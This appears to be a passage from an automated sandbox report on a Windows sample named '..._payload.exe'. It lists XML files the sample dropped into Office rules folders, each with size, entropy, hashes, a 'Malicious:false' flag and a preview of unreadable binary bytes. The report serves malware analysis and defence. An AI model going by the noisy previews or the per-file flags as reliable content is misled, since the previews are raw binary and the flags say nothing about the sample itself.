                                                                                                                                                                      Preview:.<?p...c...Z$^..JE?............$M....S..I......;{....rt.)......I\m.y$'J.....m$...ONx...&....zB_.{O.....ANs..?.>.."h=..........P..*...{km..j.RO.........p....&...{.....s..c..1..9.......Q..a......9..sJ..P.....,I.A.r....V.W.dN.J.v....\d..>L.L.......x..".2+ |..F..~y.....F.&.o.E@.....S..&.]..%..6g.1.|J+2n...#....q>.=.d....5.G.. b.D.M....J.oV.@...#.j..AY'.E...y.....jK|.0...J....&J...@`?v..&wj."..$Y.;...9P....1.....~,X...IQ;..F'.....(.0o.?V.E..?.2.ED.I.....a....!..}.....l@...L.Q..q..F...i.%.R.A...~T..`.....6..."..z#.Cb....f.E.{.O_...[s..r.....a.....n.....A..R..^..k....Q].>......\...Z$.Y.rU........}B.pCE ......"..A,......c.e.@.$...O..c@..vC..V.K...(..Jq....4..>.@..u4.k.rn.8.d4.(..7..2.M'U.\.Gx...*....a:...v..'...<.......v..!s..%.P]...&...dO.V..<...m<..cZ.[AR...+.....-...;.M..._\.....'.........M..K9...g...~.UX.hQ.....$+.L..O......j.J.....t..u~...%0....B|..i.?...]u*{.....j.S....x....\qb..q%2Y..,...m.......K.........9......8L.4..n...z.9..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703951v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1737
                                                                                                                                                                      Entropy (8bit):7.887684676938766
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:b1IlWigJfEb2mIeyT4806wkcGoikIq2FNrD:hIMlaMeVqxvzq2rH
                                                                                                                                                                      MD5:04F99969CAF7C06C9B114F7F5ADFD36D
                                                                                                                                                                      SHA1:DC7926529013A9A835FFF61A139356DB7214A609
                                                                                                                                                                      SHA-256:C52F618619AEC13FDACFAAA2430EE832E799CC02B6F03A8E51F1A301C8BF40A7
                                                                                                                                                                      SHA-512:6CF3298172255D079966C81C6383958A817710F9818531EA98285FFF9D85935CB9588C86F2A4D2734B2A9DD58C9C9457585ECCBBB18669509CDF1B1FFA32672A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.xn..`.-......O.c...T..c....(...g\.#.......[....N....."...o..?....]kI.j.\..z.......2....H>...!......j.*.+l...1.m.o.&..h..8U>.<..Y.v.F.{.4o..V..q....7k.<S.?.&>\Am.....L.x4?e...D...g.....MJoo.O..G..2B.2.:..z..$........f?.a.[..C4.X.....E..0.H*......+.Rj...[..t..'....q..g[sLN.p.J.K..p...5.0l.%..w.z...x..._...w<..gPi.<.Tw..$....C.JJZ./g..&. ...~.Htmc.......+.RH.1sc.Y/.0.+#.k.]c.l...h.{z...z.*.X...M8.k.T.e&...dbT0....R.:..Y9Yn.}....+..N.*7.o.}d..:.|...R...X..P[v...+..;f.t.(.\..j[..7...6....V....Ng...b.5(...X..z.i...o.b.Q../0.En.8.....u}..}E....(.6c.K.....a..]b.Cb.1..C.."...._..T<..'e.....=Rm...}j.G5.E../..m.X.<Y..t.f..............K...#..S1.crc...k@.Jdi...=....K$.>.I/L...?.g...k~l.ZIK...M.~,.".(...:o.NY..Yy.X.*.`...WX.l...3T....l...D....E..\Aw.Y.1.r.W.Z.K.&.@T(n.8/.Y..>.61W...g..).3..J.k...f.H..^.wZ.......x....Wnf12.....6 \0..~..|..v....d....Kx58.U3..NBn....}.8..}W'.$ee5^..X...~.c.]w.5....E~.p.g...0...5(!o.Pq..W..S..n..o.1......)q...rD..5.f..$...4.2.~.(...0)

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704000v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1716
                                                                                                                                                                      Entropy (8bit):7.874490486189695
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:ND9wD1fcgUIUiyPlts5UtiBoab+gH+HCLv8ITnx5LO8LNi8daVS5nzZOp3zlJqbO:HwpUErUtiBH+gH+ij8gql8daWS48lD
                                                                                                                                                                      MD5:9832FC3AEFBAF70AD7988100E5ACA4E1
                                                                                                                                                                      SHA1:FE09497DC182D93B187BE6A230F925DE468D2C88
                                                                                                                                                                      SHA-256:1B30F7FF7901A19B2215EBAC2CCDDB8B6E69B79635E649D4AB602E8BDE6A356C
                                                                                                                                                                      SHA-512:7C58D2F26F341646C5DA075A3507FB588AA850F535A92D82E49539B3746A995942BF255346E28713F2C5C597C427AD60AECF5D10CC1E1CA3AB1E73DE9EF0226A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.=.O.5.C4.{...]=..c.y_.m.g|...`.6.G...%.O.3.__7^*%...&..H....o..l..Y.8.F.KN.y-B.D6....|....0...rz..&...BH.z...$.nJ.apJ....z....g...e.?....+..^u4..G.6pm.H....I.y.8..z..'.H..............j...`..._......D..}..<P.......s.>...6h..O...q".gg...Cr..!.'."M.p.......rj..-G...V...Gx.........AK..DK..J.1N2..Q.........x.j....y/......E.hF.K...5...j.r.d..oB%.U...,.vyd.8.u.z.Kz......<y..b{..WS...&=...p...Z..|...o....Tt?@.......b.!./.9.=.r...s.o.BH.C.MgXu#a.&.).........W-."...[1....k].uh...A.V.&..2..tlpL..Du.....w 1.q-h.`.]...H...Q.67...i.7q...D......#......J.^.r.@...F..{T.Y."ed..Q|s.l.^B/.&...:..)l.....>..D....'hA.G+w..Y]y.n.1.K....?.{.M4....."1.h,.@..#c..1...._T.N~.>.Q|..u.,...+Z........{....x.gG:=8.K..'L..RhJQ..H.(.L... ..0}...3.0..{?.^.n...*=9 ....X.eA..t..!...J.0..N.......nj._...`.&..+8U..../.6.....OKjS....z2.....l.v..?Nc..._.x...r&..t...p(.W.h....3)#..,mS3\....8.6=..1..R.w..e..o.pUuNA^ Y=.K...c.&^......g..I`.E!.....:u&..a.i..x.i...A.,...A.f...{.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704001v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1753
                                                                                                                                                                      Entropy (8bit):7.904210230206208
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:uq/yz1Xxr1H5isdsgHH0nRRgA0lwX/j074UD:+pHZisZKqhz75
                                                                                                                                                                      MD5:71FB97326CF774093A068558439F6FE1
                                                                                                                                                                      SHA1:3B97F6ED4A9B58E0CFCA8EB766B88ED242173AC8
                                                                                                                                                                      SHA-256:E2EFDCD011CF7E101093EA8E27A3B3905052193D0A2823BBBB5DB8C6792A1D95
                                                                                                                                                                      SHA-512:7578AB30F2F9784338BC06763E15350B61AA19004A47263A42F3C7458CC011BE2C5A5DCD1C5D37EBD0D0BE84D4B678E43E551DD155E162D9E95A7E2CB8B81152
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?4xX.T..O....._,.......J.P...V..yn....:> ..I.A.w.l....{..V..j........]i!....Bj..$.5XB..M...v.......W...u.P....v....%.........M..o{pdQb...#...j.c....,..........1.!.=g...F...^.wR...2..U.la......+...b-rG{..D...do........5.V....$....,o.i..{..X.]Y.i.{..)....V.7....[.P...%K..I.......w..uS......Z.z.8..(%.....-.8..}5.z<.......]...Kwh/~..mo..y..<.F.....E....)L......"dT..;0...zED.k...0Q..._$l..b.S)D.;...Y.g..n^#.0>0.i.&\..?N.|...H..Vf.......N..aEd...M.R.?s|.'.....,...._S.....aa{O...~..)..(deP.=}.asA.j..).23.g.p.bK_.{.p}K?e.V.}..R......Gr.XV..s....1$a.+..GC..N.a.o)"..........!.p....FE...Tw@..~....D^W..G.2....7..V.Y.....:.fW..t.c...}..:7_.S\q.5......o.Y...=u.#W..b1.>}.aE..d..(}<o../..'46$.14.E....\.{.8z.e.roEPM!/5.d..mP......*..a...P....:....eh......o-{p....f.g.`&j.%]Z.J.Sj\.....x.r..Upa....R....>.kI.q..7g..N.m......h....RI}....m....M.x...2....KoZ.....`.C....T..x...xm.._.&.[...`.mzq..........U}K..W..t.7.)......*.....?#>..yI....-V.. ..d..o.7x..6....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704050v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1690
                                                                                                                                                                      Entropy (8bit):7.872594391966192
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:FK2stunQkek9LsarfM/AzIxxklqnWlaYsZD:FKntungaIKk/AsUleWGR
                                                                                                                                                                      MD5:2960D8F924676412E5AB933EFC7FD61E
                                                                                                                                                                      SHA1:78D46710D4E009BA1D29661757867D9C2CBFB029
                                                                                                                                                                      SHA-256:C4AF561DC56359D7D59D0CAC8BA4C7C5A4914C90916DB14DC3374377CCD39AFF
                                                                                                                                                                      SHA-512:1BB34CE42842C2403C65200F2B681AF702E9BFBB66EEAA25725729BAB6AEEFE8BDC474FB199A72F161FFA463FDB7E12F88F39A08C4C921ED97B783E2222D4C76
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.G.........F...H.......d..p..3..s+.34.wF......R.|P.s*q..A.g9G...n......i..._..n...x/3m..yi...s1..7.S.,T..@EH#.#..J..B.y........oi..3.f.M......Ni..`...t."..h...>'...R\m..J.f#$XJC.)V.L.R..P.X.h.,$.j..g.o..}.z.J..F.TH...(.c......5Y....J..3.c.m@.....L.n.....yT.9.M......<.X.....b.0_.?...../.D.9..OI....8.D..G...P.-16......WjB...ti./..)..G6rm..;.....:..[.(...../.}.v.....)..*v}3Z|....}.|.J.].<<jtR...E.,.2S....Vj...F[....zeP.L. E...JT(G..=?.w"%F.|2......z.2.PMK..GVR...^.:qk..dl...E.>.P....4`.+X..WA...3WB~.S...N.W.......'~.:k..Ue....:...,.F.dp{P.rn.u5..p./...F...%..+.".=...vO9.....?-......@`...{..3.h ...[p(....I.~.6......!......\ .!.t.e.8.r.a<....Y.z.....\fUW......M...!.V~n|5llf....:_./|....c.W0 .Z....rbU8..q.!...!.l....!......Qm.X.......y./A.K.ea....L!........Wh..bL;..9.Q.J&C......+......~.O.D..h...2....ooB..Uq.U..fD?_.o77"....b...$..C....L./v.]..J....$S....\\L....wm.......?.9v..1.M=w...\.w*..R.u..c..w...+....P.f.^...k..e.v.s.c.2..N.`d

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704051v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1727
                                                                                                                                                                      Entropy (8bit):7.890898457225027
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:1c1jnbalt4h8cMaO/Cn8875y2wZDkDYfgUg2ywoD:1c1nI7cMpZ8twZVgUJI
                                                                                                                                                                      MD5:8C604E06CB900C5A5A94B31AEB073C2B
                                                                                                                                                                      SHA1:952BB88E289C8C6047760F1F42F1B73F842377D1
                                                                                                                                                                      SHA-256:2FA344C544C45E19EF5C7F947FDF999A2941A1A25774F33050A269D328DD5E79
                                                                                                                                                                      SHA-512:FC84D3C852962DCB95348B4DF421EAA5831F365ADB9C67D27AB9F86747F049DCE976A2F6A46176C647F5981D4D16916687E6124724E540F066F73AF90DA5A14D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?RdL...N.03..:5..%T...)K.M...Lb...o.X.o.V.}@k.8..)...@.%V.....U.NH..........r.rp...M.%R^.S.s.LC..sx.......:I.x....Z.>..{...$\b;.&b.wdX0e....1J..+.(..p.........y...r..6N.l......=A..B._ZhLxo>.d...Y..sw..c........%...M@...... ...B..ec..Z.}./.o.tU.....b..j(...kv...3..c`.~..nh....e..a..*Bj..T?5....K.."...D.=Hi..\._..(...6.....gG.6./....0.17."`...zlL.?.%..O.l....Ku.IO...."0..K.0........g...E.1.r.^\vU...>....h..j&..,..p.JR.@B.e.7...}...4AUy-...{.%..005O.:y.M.....4.h<b..eVh...*.V......W......~.......p+..pI.|.p.gF..sTq.q.+..g9.;.c.,..X....L.....)..g.%_....Pg.H...W..*....O.... ....^(..$....@..f.C....5..~.%,.X...'....!Y..5Z..>..t./W(;.o.WL...%).A./.+.p.'..#..T[..M....[.:.n.Zl$.h.....#..\.m...e..!.Y,...m.*H.q.p......>.W.....O5<.=nx.(\.2.'.;F..a..3..C"c.....I;807...U..t..M>.O....#...I..4 ..){C.!.;.t"|....?..R........K...f.... ...zc.QhL8......_9@.Is........5T.5$.....0N.So.LN.G.-.ZS.j.+.....OgwQ..vn .C..zt.fDo......9(.$.Zp[..V"_.Q...zh+....M.(...,...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704100v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1696
                                                                                                                                                                      Entropy (8bit):7.890642543665697
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:9L4OsnNwqQVG5EXRoA7VkmTX9+D5B4mPQ2D:+LNnQUWXFZJbNA
                                                                                                                                                                      MD5:0B507AFCF333B5423DF6B55C3C119613
                                                                                                                                                                      SHA1:C710B00545FB1C15B2BC2E661C0C2A8BC8D2D272
                                                                                                                                                                      SHA-256:9BD034BB6116DD83F11CB1518A0A51D205C25C3538C65BCF0CC6BFB5C823B6FD
                                                                                                                                                                      SHA-512:50AF25ABF96CBABE5B12C9316483DAD06EFA9C99334DD7B9932744858D569705207DE3B44CFFDEBF03484C2EDAE86941BB7647BE96B4A55B219AB03B9FE7FC56
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?....c.S)3..+...X.;.......6.tG.|_.U... =.j.#.s.....J..(S|..:1.)...q.c..........!A...M..O...x?.......e.../Tg...B.T-.-9.)q"7D.H....O...JE..x.g./.....b...T...........n....|.a...3;....]..3v|.$..s-........Mh.*.......h.S...._.H....D......-..x.0:5.....h$?..Z]..gu.......A.......c<R...Y+.).P...z.]..o.cz}....b.K....T.....Q.......D...o.S....S.."S..5..^..t..X.S..s31.qs.]...\.3.&...yX.K..`.M...,.Gwq...........0S.(..ov..!#,(P............Fm..l..ld.$......>f.7.^=.%........2..8.e..n..!..N.B!Kn .+./.<.r..x.b.f.C....5rM..........M.z|..U..._..........]...].${...?.Y...Ni.6JM^...9../.4...]..o..0..R...%..I..I...`h).5-..6...21..6orI..u!...|.3..$F.]:.|rP\p..._.2.ow.0vs.X...y..b.....A.T.$.wI\..|.6...Lz........%a....+.+..Z.+......".*H....f9.)0.X..}.d .....o.../SL8.~.8.L....+Zb.(.s......g..P.d..G.../...;j..g....z.+..$Z .....{3:.M.cp......=...`OC......J7.X.t-...d.....+..Q...hC1..acb....m.Z,.{.{.............l*..OtU.W.b.H.*...'....j"C..8Y..'&.......q.....R...r.....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704101v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1733
                                                                                                                                                                      Entropy (8bit):7.870269719293032
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:QXQWTPZTliiwT5Wxdo5bbImgcjHbJuROD:GQW7ZTlin5WxdsbbImJjHbJuR2
                                                                                                                                                                      MD5:42EBA7E147B73B02A372F6158C76A2A4
                                                                                                                                                                      SHA1:58F738024F513A7A8520DA31605D9E50C92B9752
                                                                                                                                                                      SHA-256:303ECC4E22F13DA1F863740F24EA965076144EDC87CEAF76555D1235DA19EFF9
                                                                                                                                                                      SHA-512:70B3DFCF9B0BBB4D00261398BCCFF5D193A571BF9A56BCB10910F4325EC89D0D26A5CD56F357433B6FB166A6E52D0D5DCF36E2F6761F7C696FD69C16A226A8B4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?..O7....[.j..>p..[....Mmr.D..{.X.u..))?...K5O.....!YLORmeo+-.....Z;.....0..V.K.=J...`-b....W...h..`.9....4......Q.~....k"......lpE.07.l..._.9B.L...W..W;Vf...Q..B .........A.Q..u....Q:....V...<Fz.....Q.....1..W.....w...[.....oQ{u...8.Mr."X.s.N....=?...Bf.%...<....n..mPe...?OVg.HE.~fjN..........gb.l...g....'.Y..a.5_i.1.Z.t.a.b.D.H.u.W..."0.7.nF5cd{.!,i.....4{..U...y..".4i..i*....v....!...~F.5.....;.B.C...{.]L. .L.u$rYm#..,./...3...T.4........X......1O.X3..3.....*.J....s..y.....u.`.......Z1dH!.g.k.bQ.rb>`0..{....9:...aw.VN....M}..Z !...6..+...;..X[..z*%...1|.2.r..u..T.$.4..0W...p|.....-h".G0..7.?d.re.F'..V..{....6...).1....^.y@DE.LI.._.......ZU..\o.|...,#...-..`R.t...Z.+..H....B..s..P*.$.....X">.6hOL.....^u.*....+.P}.CBXgfM.K..Z.....}...b.?0hL..nw..R.r...>L......"..uu2E#..O...H0...........;OV...d..lGN8.&7K...RM}=...YK...t....6.&..6..dZ.A.... ...y.B.(.......m.4*.x.6.H.^g.....n;..y....o!...........?.p..1....##....e.............

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704150v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1696
                                                                                                                                                                      Entropy (8bit):7.890227394423154
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:BIZvM74Ubd+KB6hnhiFkyotzr1V6f0xZ1D:BM0ktKB6JEJoBpgfs
                                                                                                                                                                      MD5:D29727CE4F2958A560BA5CE5A37C6D32
                                                                                                                                                                      SHA1:5E5397CF17EE94FAB7F5CBEBAD9E09033A048E15
                                                                                                                                                                      SHA-256:24F38B5EECDB0D09826431D9343536AE219CADD1519FD4BEF3E24FEDE89EF2B5
                                                                                                                                                                      SHA-512:5A68011BAC25126F916B940B204FB67871FDE7AE1AA542C73016103BA9BE0A666A2E7EBF4E5AAD2E2681F89427A7E91171A47A0A8C898BE759676F8DD2F3CCD0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?fu.p.E...9.k.._.t..yc.. >..p...8.N..w......vt..r?C.*...u..Mg..K...S..Y..S@H.n.X[.P...nb.....s.C....8....j..kU..-..'..Y......`..b.A.~..!..Eb....|.......a c.#4.@.N..k+RV.r_.".....{..3.y,..%...Gt...{..<.........{.v#..?...D."..T.H.8..Z..]c/.nF3q.geu......a.RJ.....+.r...H..../..G.../....k...E=.1;..].lT,.p.jI?..P....&.d..H...[..q..oR........,..KT...'.-!.|;.........;...J`.S.2.I4.....-u..y.!....6..n......!.p.......Hb.C...8..$.aj.{OCb..Q..0....u.~7cc...(a.....l.".P.g3.q..=..\.F......5..gw..dTX9$._..h}2.u.PM(.."...e|W..qDi.b.U.}.......`.].hW)..QN.o$.,u..Q=....Y.aRGN..Pq.wiX<....="..d.~4+...i.(.k.....pm..........o.j.r.......&@.P.).<.#".>....>^.!^e.S!.r%..QL..KuNK)........C.V.d...qD.V....`..PtZ....d.......k..U..8.....v..9.%<[...K....r..P.m?.......8...(.'1^I.l...f......#H...W....V<m.$,.L.9.....m....ph..7.8}.l.Y.4..A..sI.].3.-.mvx.....6)+t..z..s.`;.z..F..Ql......F$...D......p..U.aO..)`!C.Z(....!..l.#.X!1.......[!#..q..6w.{,.......u...<

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704151v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1733
                                                                                                                                                                      Entropy (8bit):7.8656816292665175
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:+AJJxGkuPVQhcGd3m4KXxyTjr2EJHIMRlD:+AJBwY21XxyTjr2Etrd
                                                                                                                                                                      MD5:34119B65F775CC4D974D6916679DD643
                                                                                                                                                                      SHA1:E51CC99E04678F49CC69B2954BD78FE707B9BC74
                                                                                                                                                                      SHA-256:BEFEBB21454048BDB1675A61FB6E32592C60FD22014D4903C00C92AB59826DEB
                                                                                                                                                                      SHA-512:C2C76C4597F5D93D2BF09B8E6E0A7F9C003E0108FECDD5C6D4F3906744E3B014C4A3DE016B3AA749B305EED1B3BBE8A7B9D5DE321B354275CF85BDD8BFF90BDE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.v>.G..E0..H~..o....3,.u...\..O.#.[m*...^E...U..aO...U..4[.)^~..Z../9d..8?..E.0Pvn,..M..0...M.^J.........-.qWK.....,.....i.^+9.x.v.7#={f5P...t...^.Q._.....G6@3F.cp..Z...\u.it.O.,.._m.......;-...Q...U....V.5..a.o_|7.....$..Z=.d..4..bfk#v.$.EO...7.O7.:.......AiOY.E...6I.....U....$Rp......]....@u.~.I../..oD..2..&@3.q..:.&.1E..B....gf(4.].n oC...mI!.*.k...Q........{.%X....ii...Y.`1w.5.].O...<e......GBS....4a...c.."...7.%.|.n..._Q..9P.4...+/m....'..M.)..Vtd."....j(..;..gT.....#'E.~.P.n.2....f.J'~+...K.|../..=......NQ.....!yD..9.../....#.....=y.1p.f9..d..u.Su ..e.i.....w.UB..M..r..$..)..I..4m94...cz...gy...:..&W....s.wz..#.[z=._.).......T.J.'..*g=i,..s.:.W...K..{i./.c......w.poQ.;S..D....}.'...q..............S6..t~)........SCM.z5..rm..g.(.~....@....\.~t..a.....=a.2...6...&./....X.edX.r*.4.y......Y.Jl...{.I1.e..B..g.(.3i4U..t...wC.....#....H7,.......m#..s.@..y-..........o.$......q.c.......2..)o.,.#..qp. S....$..._.9..+..f.........;..h@.>XI

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704200v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1714
                                                                                                                                                                      Entropy (8bit):7.883288869398063
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:Z7G8EBWlEO+6F0gLQvDVmSmz7DaYhFMmINT0BkHvKBqQ/D:BGhYOd6FjLQbVmSmflFST0BcSH
                                                                                                                                                                      MD5:2E812A9FC7B01BEE300F4C3A8F988BFE
                                                                                                                                                                      SHA1:5D6D15B9A5989E11DD994AE51CF51CA58C61771D
                                                                                                                                                                      SHA-256:0D4AFD9941BA412F71D93C8505847AE2C4C0FC0451F8C50838D43B804913CDC8
                                                                                                                                                                      SHA-512:C8AD28338ADF92B7C4492F99E961801468E2701014E714256C5DDFB023D9CA08FA8BC28898C7651F8253638FAAA25DBC6416E4B8609ABCF70C6ECC1A2F076B6A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?..}..k...pKp(..........p.e...W....o..z*.........I;......7D..g.ku.D...I...lw9.k..0..P7m{.. .....N$.dc....8b..#.. v.?r......mg."%e.M..LA..0Rg..$..;. .H@f.k.7.?]..!.0.D. e..$V}k...m....9..y.B.(.e.u.P.....g5...mVVE?..*..Q..q..E..F[....D.....2...n..L{...........'...e}.[O/:...S..go.(..;)q.FS..S......={s.E$.ea |.`.JK..h...y...~...({..E..o.[.OyoFC0k....,.-N..L.S=._..qK.....Em..........7(../.DH)....~.w._..._?..%`A......]%#.CB.0a?..x..`r..Q0Q..u.U.wE.Y>..y.v.uEG...}.Ag.5........`b...f.6.U...b4....ImUO. .D.x........t~..1sV....d..s..X..r.~.2Mtv..3...|.0...|(.o.....B..`3.Y%a:...pn.0.#.".v...:]..4.r..I..A9..;.aa~.&`......y.....V..P..l..j...E.@..Q.|^.!Wo..^...Q......(].....:|.+xo.Qi.1..~.{.Y.`..k..k.....zTy..q.........W.*0......tEa..3.....S...D.........`z$b.HI{H..xj.&]........ ../.+.C.7.h..g....'8h{..&LV.>.^.%..4/....]....K0.n.....c5i..cQ...."..|d/..w.u.(....A.......J..g... .U..O...I..#...%.C0..u;.kR..,....]....jZDZL..`4.Z.C.......H....^....O.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704201v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1751
                                                                                                                                                                      Entropy (8bit):7.892950066512938
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:gjoo/1MZvJpt9WqvdxtVJI+Q42mCkk8R+zm0l8oKCNENI2Jc+ZG16VT2bD:gbEJFWqVX704LEggrKCh+w16VAD
                                                                                                                                                                      MD5:334127201FCEF324A6F98ACAC5197931
                                                                                                                                                                      SHA1:C844F106266C0E12848C906139A23D0E4A64E524
                                                                                                                                                                      SHA-256:CBC923DC27802EFD3159FC4EBC055375A67AEFC5219974DD40F4BFF3F31CB659
                                                                                                                                                                      SHA-512:C25B6F0350D0D4667F95F914947B5A042A8B3E98DE6EF92DD3D7CEB047E222FB451C969AEF9297B60934254C8DF7710A1A28AEE8DBEA12C5DFB36AB927CF30AF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.c..a....#.k.o.9UN.|...K....."..]."!...mu.*kr...v.y5Y-......PU..m....L.t..d-.a%..v....,;..v....U....d@.w..;W.;.$..0...E....B.U.WMD..HH..&..e...6..`.)..U...K...f....$.i<..I.|..n..5...\I.)!w3%.*p..d:..../..?\.>.Q.e......n.h.K.=.q....Y...O[Zy...X?+...............6..[..|.Ix._...p.R(.`.g.p....m..p{TJuT.p...u...%(....L...WM..<...z.....FRz.Pg.8..y...x.."Z;...+.c)0....}.&Q..'<.8.G..\U>..Kk.e.r....Z.5.o...Z.H.."C*BTj...Jj.n+.Q[.....$[.f.u..4............S..G.........I..D...Mk7Q].W.O..s..2/:...Yk..H.\.Tm.....O.p..X..|y..6.7L2...^}.7.....+q.E3....$...n.Y....x.nn._.C+.76Q.....3.V..[...........!...`.MQ..D...n..?....x.....x.K>.N91.i2.n.....o......3.3.f....@.rV].^.)b.^....5.K?............ >K.}.......?i....L/Z...._a...9.j.5....U..k........]...m.*...a.^.8.6..@<s...X5..;.<[.?l..h.n.G.._.g.+.........[.....=.z3v.....}%&/:..y.d..2.5.+..B+...7|....B...$P...$uh...@X;A.h..Q?...Z`....n(Q...WZ.r.Qm.].y.[./.H..].#!...).,8.{.GO..^...=..t'..N.'...&q.....O..xO

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule90401v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1583
                                                                                                                                                                      Entropy (8bit):7.884620643590213
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:GH8x6QKJCryY9yh98W9p60nP89SJQJUNr5t7QrDGuZjBaG8fS6gPwqONAZS2bD:GO6nl62mSnTtQDGgjd8f/gPwqOUD
                                                                                                                                                                      MD5:CD49B2B370203D0D4C30A8C694837F58
                                                                                                                                                                      SHA1:359D4F136C9AE496D773E01E005D68B24FAD3B4D
                                                                                                                                                                      SHA-256:FA3D85263770418737677229475C33649DE9FD4D5DB3B9DAF0A53F989F3F411E
                                                                                                                                                                      SHA-512:30666C947901AAB9F6AF111E20C26F806D2D878FF70835008746254EF915247489249207761944A826180425A5357A4D953B74B74A0550E4F207C7C1FD842828
                                                                                                                                                                      Malicious:false
